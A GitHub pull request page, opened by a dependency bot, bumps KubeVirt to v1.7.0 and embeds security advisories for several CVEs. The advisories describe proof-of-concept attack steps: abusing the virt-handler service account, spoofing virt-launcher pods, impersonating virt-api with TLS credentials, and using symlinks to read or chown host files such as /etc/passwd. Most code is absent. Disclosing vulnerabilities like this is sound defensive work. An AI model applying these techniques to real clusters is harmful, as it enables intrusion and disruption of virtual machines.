-
Notifications
You must be signed in to change notification settings - Fork 35
chore(deps): update module kubevirt.io/kubevirt to v1.7.0 [security] (release-v0.24) #773
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Conversation
Signed-off-by: null <[email protected]>
|
|
[APPROVALNOTIFIER] This PR is NOT APPROVED This pull-request has been approved by: The full list of commands accepted by this bot can be found here.
Needs approval from an approver in each of these files:
Approvers can indicate their approval by writing |
|
[APPROVALNOTIFIER] This PR is NOT APPROVED This pull-request has been approved by: redhat-renovate-bot The full list of commands accepted by this bot can be found here.
Needs approval from an approver in each of these files:
Approvers can indicate their approval by writing |
|
@redhat-renovate-bot: The following tests failed, say
Full PR test history. Your PR dashboard. Instructions for interacting with me using PR comments are available here. If you have questions or suggestions related to my behavior, please file an issue against the kubernetes-sigs/prow repository. I understand the commands that are listed here. |
|
/close |
|
@ksimon1: Closed this PR. In response to this:
Instructions for interacting with me using PR comments are available here. If you have questions or suggestions related to my behavior, please file an issue against the kubernetes-sigs/prow repository. |
Renovate Ignore NotificationBecause you closed this PR without merging, Renovate will ignore this update ( If you accidentally closed this PR, or if you changed your mind: rename this PR to get a fresh replacement PR. |
This PR contains the following updates:
v1.4.0->v1.7.0GitHub Vulnerability Alerts
CVE-2025-64436
Summary
The permissions granted to the
virt-handlerservice account, such as the ability to update VMI and patch nodes, could be abused to force a VMI migration to an attacker-controlled node.Details
Following the GitHub security advisory published on March 23 2023, a
ValidatingAdmissionPolicywas introduced to impose restrictions on which sections of node resources thevirt-handlerservice account can modify. For instance, thespecsection of nodes has been made immutable, and modifications to thelabelssection are now limited tokubevirt.io-prefixed labels only. This vulnerability could otherwise allow an attacker to mark all nodes as unschedulable, potentially forcing the migration or creation of privileged pods onto a compromised node.However, if a
virt-handlerservice account is compromised, either through the pod itself or the underlying node, an attacker may still modify node labels, both on the compromised node and on other nodes within the cluster. Notably,virt-handlersets a specifickubevirt.ioboolean label,kubevirt.io/schedulable, which indicates whether the node can host VMI workloads. An attacker could repeatedly patch other nodes by setting this label tofalse, thereby forcing all #acr("vmi") instances to be scheduled exclusively on the compromised node.Another finding describes how a compromised
virt-handlerinstance can perform operations on other nodes that are intended to be executed solely byvirt-api. This significantly increases both the impact and the likelihood of the vulnerability being exploitedAdditionally, by default, the
virt-handlerservice account has permission to update all VMI resources across the cluster, including those not running on the same node. While a security mechanism similar to the kubelet'sNodeRestrictionfeature exists to limit this scope, it is controlled by a feature gate and is therefore not enabled by default.PoC
By injecting incorrect data into a running VMI, for example, by altering the
kubevirt.io/nodeNamelabel to reference a different node, the VMI is marked as terminated and its state transitions toSucceeded. This incorrect state could mislead an administrator into restarting the VMI, causing it to be re-created on a node of the attacker's choosing. As an example, the following demonstrates how to instantiate a basic VMI:The VMI is then created on a minikube node identified with
minikube-m02:operator@minikube:~$ kubectl get vmi testvm NAME AGE PHASE IP NODENAME READY testvm 20s Running 10.244.1.8 minikube-m02 TrueAssume that a
virt-handlerpod, running on nodeminikube-m03, is compromised and an attacker and the latter wants thetestvmto be re-deployed on a controlled by them node.First, we retrieve the
virt-handlerservice account token in order to be able to perform requests to the Kubernetes API:The attacker updates the VMI object labels in a way that makes it terminate:
Now, the attacker can use the excessive permissions of the
virt-handlerservice account to patch theminikube-m02node in order to mark it as unschedulable for VMI workloads:Note: This request could require multiple invocations as the
virt-handleris continuously updating the schedulable state of the node it is running on.Finally, an admin user decides to restart the VMI:
Identifying the origin node of a request is not a straightforward task. One potential solution is to embed additional authentication data, such as the
userInfoobject, indicating the node on which the service account is currently running. This approach would be similar to Kubernetes'NodeRestrictionfeature gate. Since Kubernetes version 1.32, thenodeauthorization mode, enforced via theNodeRestrictionadmission plugin, is enabled by default for kubelets running in the cluster. The equivalent feature gate in KubeVirt should likewise be enabled by default when the underlying Kubernetes version is 1.32 or higher.An alternative approach would be to create a dedicated
virt-handlerservice account for each node, embedding the node name into the account identity. This would allow the origin node to be inferred from theuserInfo.usernamefield of theAdmissionRequestobject. However, this method introduces additional operational overhead in terms of monitoring and maintenance.Impact
This vulnerability could otherwise allow an attacker to mark all nodes as unschedulable, potentially forcing the migration or creation of privileged pods onto a compromised node.
CVE-2025-64435
Summary
_Short summary of the problem. Make the impact and severity as clear as possible.
A logic flaw in the
virt-controllerallows an attacker to disrupt the control over a running VMI by creating a pod with the same labels as the legitimatevirt-launcherpod associated with the VMI. This can mislead thevirt-controllerinto associating the fake pod with the VMI, resulting in incorrect status updates and potentially causing a DoS (Denial-of-Service).Details
Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer.
A vulnerability has been identified in the logic responsible for reconciling the state of VMI. Specifically, it is possible to associate a malicious attacker-controlled pod with an existing VMI running within the same namespace as the pod, thereby replacing the legitimate
virt-launcherpod associated with the VMI.The
virt-launcherpod is critical for enforcing the isolation mechanisms applied to the QEMU process that runs the virtual machine. It also serves, along withvirt-handler, as a management interface that allows cluster users, operators, or administrators to control the lifecycle of the VMI (e.g., starting, stopping, or migrating it).When
virt-controllerreceives a notification about a change in a VMI's state, it attempts to identify the correspondingvirt-launcherpod. This is necessary in several scenarios, including:virt-launcherpod.virt-launcherpod's cgroups.virt-launcherpod's cgroups.The core issue lies in the implementation of the
GetControllerOffunction, which is responsible for determining the controller (i.e., owning resource) of a given pod. In its current form, this logic can be manipulated, allowing an attacker to substitute a rogue pod in place of the legitimatevirt-launcher, thereby compromising the VMI's integrity and control mechanisms.The current logic assumes that a
virt-launcherpod associated with a VMI may not always have acontrollerRef. In such cases, the controller falls back to inspecting the pod's labels. Specifically it evaluates thekubevirt.io/created-bylabel, which is expected to match the UID of the VMI triggering the reconciliation loop. If multiple pods are found that could be associated with the same VMI, thevirt-controllerselects the most recently created one.This logic appears to be designed with migration scenarios in mind, where it is expected that two
virt-launcherpods might temporarily coexist for the same VMI: one for the migration source and one for the migration target node. However, a scenario was not identified in which a legitimatevirt-launcherpod lacks acontrollerRefand relies solely on labels (such askubevirt.io/created-by) to indicate its association with a VMI.This fallback behaviour introduces a security risk. If an attacker is able to obtain the UID of a running VMI and create a pod within the same namespace, they can assign it labels that mimic those of a legitimate
virt-launcherpod. As a result, theCurrentVMIPodfunction could mistakenly return the attacker-controlled pod instead of the authentic one.This vulnerability has at least two serious consequences:
nodeSelectorornodeAffinity, which are typically used to enforce workload placement policies.PoC
Complete instructions, including specific configuration details, to reproduce the vulnerability.
Consider the following VMI definition:
The UID of the VMI can also be found as an argument to the container in the
virt-launcherpod:Consider the following attacker-controlled pod which is associated to the VMI using the UID defined in the
kubevirt.io/created-bylabel:To effectively attach the fake pod to the VMI, the attacker should wait for a state update to trigger the reconciliation loop:
To illustrate the impact of this vulnerability, a race condition will be triggered in the
syncfunction of the VMI controller:The above code adds additional annotations to the
virt-launcherpod related to node eviction. This happens via an API call to Kubernetes which upon success returns a new updated pod object. This object replaces the current one in the execution flow.There is a tiny window where an attacker could trigger a race condition which will mark the VMI as failed:
To trigger it, the attacker should update the
fake-launcherpod's annotations before the checkvmiPodExists := controller.PodExists(pod) && !isTempPod(pod)insync, and between the checkif !isTempPod(pod) && controller.IsPodReady(pod)insyncbut before the patch API call insyncPodAnnotationsas follows:The above annotation will mark the attacker pod as ephemeral (i.e., used to provision the VMI) and will fail the VMI as the latter is already running (provisioning happens before the VMI starts running).
The update should also happen during the reconciliation loop when the
fake-launcherpod is initially going to be associated with the VMI and its labels, related to eviction, updated.Upon successful exploitation the VMI is marked as failed and could not be controlled via the Kubernetes API. However, the QEMU process is still running and the VMI is still present in the cluster:
Impact
As a result, an attacker could provoke a DoS condition for the affected VMI, compromising the availability of the services it provides.
KubeVirt Improper TLS Certificate Management Handling Allows API Identity Spoofing in kubevirt.io/kubevirt
CVE-2025-64434 / GHSA-ggp9-c99x-54gp / GO-2025-4107
More information
Details
KubeVirt Improper TLS Certificate Management Handling Allows API Identity Spoofing in kubevirt.io/kubevirt
Severity
Unknown
References
This data is provided by OSV and the Go Vulnerability Database (CC-BY 4.0).
KubeVirt's Improper TLS Certificate Management Handling Allows API Identity Spoofing
CVE-2025-64434 / GHSA-ggp9-c99x-54gp / GO-2025-4107
More information
Details
Summary
Due to improper TLS certificate management, a compromised
virt-handlercould impersonatevirt-apiby using its own TLS credentials, allowing it to initiate privileged operations against anothervirt-handler.Details
Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer.
Because of improper TLS certificate management, a compromised
virt-handlerinstance can reuse its TLS bundle to impersonatevirt-api, enabling unauthorized access to VM lifecycle operations on othervirt-handlernodes.The
virt-apicomponent acts as a sub-resource server, and it proxies API VM lifecycle requests tovirt-handlerinstances.The communication between
virt-apiandvirt-handlerinstances is secured using mTLS. The former acts as a client while the latter as the server. The client certificate used byvirt-apiis defined in the source code as follows and have the following properties:The
virt-handlercomponent verifies the signature of client certificates using a self-signed root CA. This latter is generated byvirt-operatorwhen the KubeVirt stack is deployed and it is stored within a ConfigMap in thekubevirtnamespace. This configmap is used as a trust anchor by allvirt-handlerinstances to verify client certificates.The
kubevirt-cais also used to sign the server certificate which is used by avirt-handlerinstance:In addition to the validity of the signature, the
virt-handlercomponent also verifies the CN field of the presented certificate:<code.sec.SetupTLSForVirtHandlerServer>
The above code illustrates that client certificates accepted be KubeVirt should have as CN
kubevirt.io:system:client:virt-handlerwhich is the same as the CN present in thevirt-api's certificate. However, the latter is not the only component in the KubeVirt stack which can communicate with avirt-handlerinstance.In addition to the extension API server, any other
virt-handlercan communicate with it. This happens in the context of VM migration operations. When a VM is migrated from one node to another, thevirt-handlers on both nodes are going to use structures calledProxyManagerto communicate back and forth on the state of the migration.This communication follows a classical client-server model, where the
virt-handleron the migration source node acts as a client and thevirt-handleron the migration destination node acts as a server. This communication is also secured using mTLS. The server certificate presented by thevirt-handleracting as a migration destination node is the same as the one which is used for the communication between the samevirt-handlerand thevirt-apiin the context of VM lifecycle operations (CN=kubevirt.io:system:node:virt-handler). However, the client certificate which is used by avirt-handlerinstance has the same CN as the client certificate used byvirt-api.Although the migration procedure, where two separate
virt-handlerinstances coordinate the transfer of a VM's state, is not directly tied to the communication betweenvirt-apiandvirt-handlerduring VM lifecycle management, there is a critical overlap in the TLS authentication mechanism. Specifically, the client certificate used by bothvirt-handlerandvirt-apishares the same CN field, despite the use of different, randomly allocated ports, for the two types of communication.PoC
Complete instructions, including specific configuration details, to reproduce the vulnerability.
To illustrate the vulnerability, a Minikube cluster has been deployed with two nodes (
minikubeandminikube-m02) thus, with twovirt-handlerinstances alongside a vmi running on one of the nodes. It is considered that an attacker has obtained access to the client certificate bundle used by thevirt-handlerinstance running on the compromised node (minikube) while the virtual machine is running on the other node (minikube-m02). Thus, they can interact with the sub-resource API exposed by the othervirt-handlerinstance and control the lifecycle of the VMs running on the other node:Impact
What kind of vulnerability is it? Who is impacted?
Due to the peer verification logic in
virt-handler(viaverifyPeerCert), an attacker who compromises avirt-handlerinstance, could exploit these shared credentials to impersonatevirt-apiand execute privileged operations against othervirt-handlerinstances potentially compromising the integrity and availability of the managed by it VM.Severity
CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:HReferences
This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).
KubeVirt Arbitrary Container File Read in kubevirt.io/kubevirt
CVE-2025-64433 / GHSA-qw6q-3pgr-5cwq / GO-2025-4109
More information
Details
KubeVirt Arbitrary Container File Read in kubevirt.io/kubevirt
Severity
Unknown
References
This data is provided by OSV and the Go Vulnerability Database (CC-BY 4.0).
KubeVirt Arbitrary Container File Read
CVE-2025-64433 / GHSA-qw6q-3pgr-5cwq / GO-2025-4109
More information
Details
Summary
_Short summary of the problem. Make the impact and severity as clear as possible.
Mounting a user-controlled PVC disk within a VM allows an attacker to read any file present in the
virt-launcherpod. This is due to erroneous handling of symlinks defined within a PVC.Details
Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer.
A vulnerability was discovered that allows a VM to read arbitrary files from the
virt-launcherpod's file system. This issue stems from improper symlink handling when mounting PVC disks into a VM. Specifically, if a malicious user has full or partial control over the contents of a PVC, they can create a symbolic link that points to a file within thevirt-launcherpod's file system. Sincelibvirtcan treat regular files as block devices, any file on the pod's file system that is symlinked in this way can be mounted into the VM and subsequently read.Although a security mechanism exists where VMs are executed as an unprivileged user with UID
107inside thevirt-launchercontainer, limiting the scope of accessible resources, this restriction is bypassed due to a second vulnerability (TODO: put link here). The latter causes the ownership of any file intended for mounting to be changed to the unprivileged user with UID107prior to mounting. As a result, an attacker can gain access to and read arbitrary files located within thevirt-launcherpod's file system or on a mounted PVC from within the guest VM.PoC
Complete instructions, including specific configuration details, to reproduce the vulnerability.
Consider that an attacker has control over the contents of two PVC (e.g., from within a container) and creates the following symlinks:
By default, Minikube's storage controller (
hostpath-provisioner) will allocate the claim as a directory on the host node (HostPath). Once the above Kubernetes resources are created, the user can create the symlinks within the PVC as follows:Of course, these links could potentially be broken as the files, especially
default_arbitrary-container-read.xml, could not exist on thedual-pvc-podpod's file system. The attacker then deploy the following VM:The two PVCs will be mounted as volumes in "filesystem" mode:
From the documentation of the different volume modes, one can infer that if the backing
disk.imgis not owned by the unprivileged user with UID107, the VM should fail to mount it. In addition, it's expected that this backing file is in RAW format. While this format can contain pretty much anything, we consider that being able to mount a file from the file system ofvirt-launcheris not the expected behaviour. Below is demonstrated that after applying the VM manifest, the guest can read the/etc/passwdanddefault_migration.xmlfiles from thevirt-launcherpod's file system:Impact
What kind of vulnerability is it? Who is impacted?
This vulnerability breaches the container-to-VM isolation boundary, compromising the confidentiality of storage data.
Severity
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:NReferences
This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).
KubeVirt Affected by an Authentication Bypass in Kubernetes Aggregation Layer in kubevirt.io/kubevirt
CVE-2025-64432 / GHSA-38jw-g2qx-4286 / GO-2025-4103
More information
Details
KubeVirt Affected by an Authentication Bypass in Kubernetes Aggregation Layer in kubevirt.io/kubevirt
Severity
Unknown
References
This data is provided by OSV and the Go Vulnerability Database (CC-BY 4.0).
KubeVirt Isolation Detection Flaw Allows Arbitrary File Permission Changes
CVE-2025-64437 / GHSA-2r4r-5x78-mvqf / GO-2025-4102
More information
Details
Summary
_Short summary of the problem. Make the impact and severity as clear as possible.
It is possible to trick the
virt-handlercomponent into changing the ownership of arbitrary files on the host node to the unprivileged user with UID107due to mishandling of symlinks when determining the root mount of avirt-launcherpod.Details
Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer.
In the current implementation, the
virt-handlerdoes not verify whether thelauncher-sockis a symlink or a regular file. This oversight can be exploited, for example, to change the ownership of arbitrary files on the host node to the unprivileged user with UID107(the same user used byvirt-launcher) thus, compromising the CIA (Confidentiality, Integrity and Availability) of data on the host.To successfully exploit this vulnerability, an attacker should be in control of the file system of the
virt-launcherpod.PoC
Complete instructions, including specific configuration details, to reproduce the vulnerability.
In this demonstration, two additional vulnerabilities are combined with the primary issue to arbitrarily change the ownership of a file located on the host node:
launcher-sock) is used to manipulate the interpretation of the root mount within the affected container, effectively bypassing expected isolation boundaries.disk.img) is employed to alter the perceived location of data within a PVC, redirecting it to a file owned by root on the host filesystem.It is assumed that an attacker has access to a
virt-launcherpod's file system (for example, obtained using another vulnerability) and also has access to the host file system with the privileges of theqemuuser (UID=107). It is also assumed that they can create unprivileged user namespaces:admin@minikube:~$ sysctl -w kernel.unprivileged_userns_clone=1The below is inspired by an article, where the attacker constructs an isolated environment solely using Linux namespaces and an augmented Alpine container root file system.
After the environment is set, the
launcher-sockin thevirt-launchercontainer should be replaced with a symlink to../../../../../../../../../proc/2245509/root/tmp/bad.sock(2245509 is the PID of the above isolated shell process). This should be done, however, in a the right moment. For this demonstration, it was decided to trigger the bug while leveraging a race condition when creating or updating a VMI:The manifest of the #acr("vmi") which is going to trigger the bug is:
Just before the line is executed, the attacker should replace the
launcher-sockwith a symlink to thebad.sockcontrolled by the isolated process:Upon successful exploitation,
virt-launcherconnects to the attacker controlled socket, misinterprets the root mount and changes the permissions of the host's/etc/passwdfile: